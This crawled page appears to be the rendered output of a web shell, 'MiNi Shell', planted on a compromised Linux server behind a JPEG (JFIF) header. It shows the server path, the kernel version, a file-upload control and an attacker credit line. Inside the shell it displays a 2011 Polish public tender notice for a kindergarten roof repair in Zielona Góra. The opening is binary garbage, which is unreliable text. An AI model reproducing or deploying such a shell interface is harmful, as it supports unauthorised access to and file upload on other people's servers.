JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110405/65292-N-2011.html

<p class="kh_header"><b>Zielona Góra: Remont dachu z wymianą pokrycia,oblachowania,rynien i rur spustowych budynku
Miejskiego Przedszkola nr 30 przy ul.Tuwima 3b w Zielonej Górze.</b><br>
<b>Numer ogłoszenia: 65292 - 2011; data zamieszczenia: 05.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Edukacyjny Nr 2 w Zielonej Górze , ul. Staffa 10, 65-436 Zielona Góra, woj. lubuskie, tel. 0-68 453 88 83, faks 0-68 453 88 84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp17.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Przedszkole Miejskie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dachu z wymianą pokrycia,oblachowania,rynien i rur spustowych budynku
Miejskiego Przedszkola nr 30 przy ul.Tuwima 3b w Zielonej Górze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Remont dachu z wymianą pokrycia,oblachowania,rynien i rur spustowych budynku
   Miejskiego Przedszkola nr 30 przy ul. Tuwima 3b w Zielonej Górze.
2 Przedmiot zamówienia należy wykonać zgodnie ze Specyfikacją Techniczną
  Wykonania i Odbioru Robót(STWiOR) stanowiący załącznik nr 11 do niniejszej SIWZ.
3 W zakres prac objętych przedmiotem zamówienia wchodzą:
3.1 Demontaż pokrycia papowego(częściowy) wraz z naprawą i podklejeniem
     podłoża
3.2 Naprawa blacharki, rynien i rur spustowych.
3.3 Uzupełnienie ubytków tynku na kominach wentylacyjnych i attykach.
3.4 Naprawa obróbek papą termozgrzewalną.
3.5 Uzupełnienie czap kominowych.
3.6 Malowanie kominów wentylacyjnych.
3.7 Pokrycie dachu papą termozgrzewalną modyfikowaną( 1 warstwa).
3.8 Remont- wymiana instalacji odgromowej.
4. Szczegółowy zakres robót zawarty jest w STWiOR,o której mowa w pkt 3.2
    SIWZ oraz kosztorysie ofertowym robót budowlanych, instalacyjnych
    stanowiącym załącznik nr 9 do niniejszej SIWZ.
5. Zakres prac oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną
   ceną ofertową obejmuje również:
5.1 organizację,zagospodarowanie i utrzymanie zaplecza budowy, roboty
     przygotowawcze i porządkowe.
5.2 pełnego ubezpieczenia budowy zgodnie z obowiązującymi przepisami prawa.
5.3 zorganizowanie i przeprowadzenie niezbędnych odbiorów.
5.4 ponoszenie kosztów związanych ze zużyciem wody i energii elektrycznej
     na potrzeby budowy.
5.5 zapewnienie na terenie budowy należytego ładu i porządku,przestrzeganie
     przepisów BHP oraz utrzymanie terenu budowy w stanie wolnym od przeszkód
     komunikacyjnych i wydzielenie stref bezpieczeństwa.
5.6 zapewnienie i ponoszenie kosztów związanych z usunięciem oraz składowaniem
     materiałów rozbiórkowych i innych odpadów powstałych w czasie realizacji
     przedmiotu zamówienia.
5.7 po zakończeniu robót uporządkowanie terenu w terminie nie póżniejszym niż
     termin odbioru przedmiotu zamówienia.
6. Wykonawca na wykonany przedmiot zamówienia udzieli gwarancji należytego 
    wykonania robót na okres 36 miesięcy oraz rękojmi za wady na okres 
    przekraczający gwarancję o 6 miesięcy.
7. Wykonawca winien dostarczyć Zamawiającemu przed podpisaniem umowy:
7.1 kopię aktualnej (opłaconej) polisy ubezpieczenia od odpowiedzialności cywilnej
   w zakresie prowadzonej działalności gospodarczej o wartości minimum 70.000.00zł..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.45.30.00-7, 45.26.12.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać,że w okresie ostatnich pięciu lat przed upływem terminu 
składania ofert do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest
krótszy-w tym okresie, wykonał co najmniej dwa zadania w zakresie robót dachowych
(wykonanie lub remont) o minimalnej wartości 25.000.00 zł brutto każde
udokumentowane, że zostały wykonane zgodnie z zasadami sztuki budowlanej i
prawidłowo ukończone.


Ocena spełniania ww. warunków udziału w postępowaniu odbywać się będzie na
podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady
spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia
które będą uczestniczyć w wykonaniu zamówienia, w szczególności do kierowania
robotami budowlanymi, należącymi do właściwej izby samorządu zawodowego,
posiadającymi zgodnie z ustawą z dnia 7 lipca 1994 r.-Prawo budowlane(Dz.U z 2006r
nr 156,poz 1118-tekst jednolity z póżn.zm.) uprawnienia budowlane w specjalności:
a. konstrukcyjno-budowlanej co najmniej w ograniczonym zakresie.
b. instalacyjnej w zakresie sieci,instalacji i urządzeń elektrycznych i  
   elektroenergetycznych co najmniej w ograniczonym zakresie(uprawnienia E o
   napięciu do 1 kw),lub odpowiadające im ważne uprawnienia budowlane,które 
   zostały wydane na podstawie wcześniej obowiązujących przepisów


Ocena spełnienia ww. warunków udziału w postępowaniu odbywać się będzie na
 podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wgzasady
 spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wypełnione i podpisane oświadczenie o spełnieniu warunków art.22 ust.1 pkt 1-4
   ustawy pzp wg. załącznika nr 3 do SIWZ.
- oświadczenie, że wykonawca wykona zamówienie własnymi siłami lub określi część
  zamówienia,której wykonanie powierzy podwykonawcom wg załącznika nr 2 do SIWZ.
- dokładnie wypełniony kosztorys ofertowy( w polskich złotych, z dokładnością do
  dwóch miejsc po przecinku) wg. załącznika nr 9 do SIWZ.
- zaakceptowany projekt umowu wg. załącznika nr 10 do SIWZ.
- pełnomocnictwo lub inny dokument określający zakres umocowania do 
  reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić w formie aneksu za zgodą obu
    stron wyrażoną na piśmie, pod rygorem nieważności.
2. Strony dopuszczają możliwość zmiany postanowień zawartej umowy w stosunku
    do treści złożonej oferty w zakresie:
    1) w stosunku do terminu realizacji umowy:
     - konieczności zlecenia prac dodatkowych w trybie zgodnym z przepisami Ustawy 
        pzp.
     - zmiany przepisów powodujących konieczność innych rozwiązań, niż zakładano
        w opisie przedmiotu zamówienia lub SIWZ.
     - zmiany przepisów powodujących konieczność uzyskania dokumentów, które
       te przepisy narzucają.
     -gdy organy i instytucje uzgadniające nie wydały uzgodnień w ustawowym 
       terminie.
   b) w stosunku do osób:
   - zmiany osób reprezentujących w przypadku zmian organizacyjnych;
   - zmiany osób realizujących zadania pod warunkiem,że osoby te  będą spełniały
      wymagania określone w SIWZ;
   c) inne;
    -w przypadku zmiany urzędowej stawki VAT;
    -w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego( np. gdy 
      obniży to koszty inwestycji albo skróci czas realizacji);
    - zmiany nazwy zadania;
    - zmiany cen jednostkowych nowych materiałów(produktów)składających się na
      przedmiot zamówienia nie powodujących zmiany ogólnej wartości umowy;
    - zmniejszenia przedmiotu zamówienia,pod warunkiem że z niemożliwych do
      przewidzenia na etapie planowania inwestycji przyczyn wykonanie całości
      przedmiotu zamówienia napotyka istotne trudności, których przezwyciężenie
      wymagałoby poniesienia niewspółmiernie wysokich kosztów, w takim przypadku
      Wykonawca może żądać wynagrodzenia tylko za wykonaną część umowy;
    - wystąpienia w trakcie robót kolizji z sieciami lub innymi przeszkodami,które nie
      były możliwe do przewidzenia po przeanalizowaniu projektu budowlanego,
      wykonawczego oraz uzgodnień,
    - wstrzymanie robót lub przerw w pracach,powstałych z przyczyn leżących po
      stronie Zamawiającego,
    - wstrzymania robót, na mocy decyzji organów uprawnionych do wstrzymania lub
      przerwania robót, z przyczyn niezależnych od Zamawiającego lub Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sp17.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego - sekretariat szkoły.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2011 godzina 09:00, miejsce: siedziba Zamawiającego, sekretariat szkoły (parter).
otwarcie ofert w dniu 06.05.2011 o godz 09:15, w siedziba Zamawiającego
 gabinet dyrektora..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com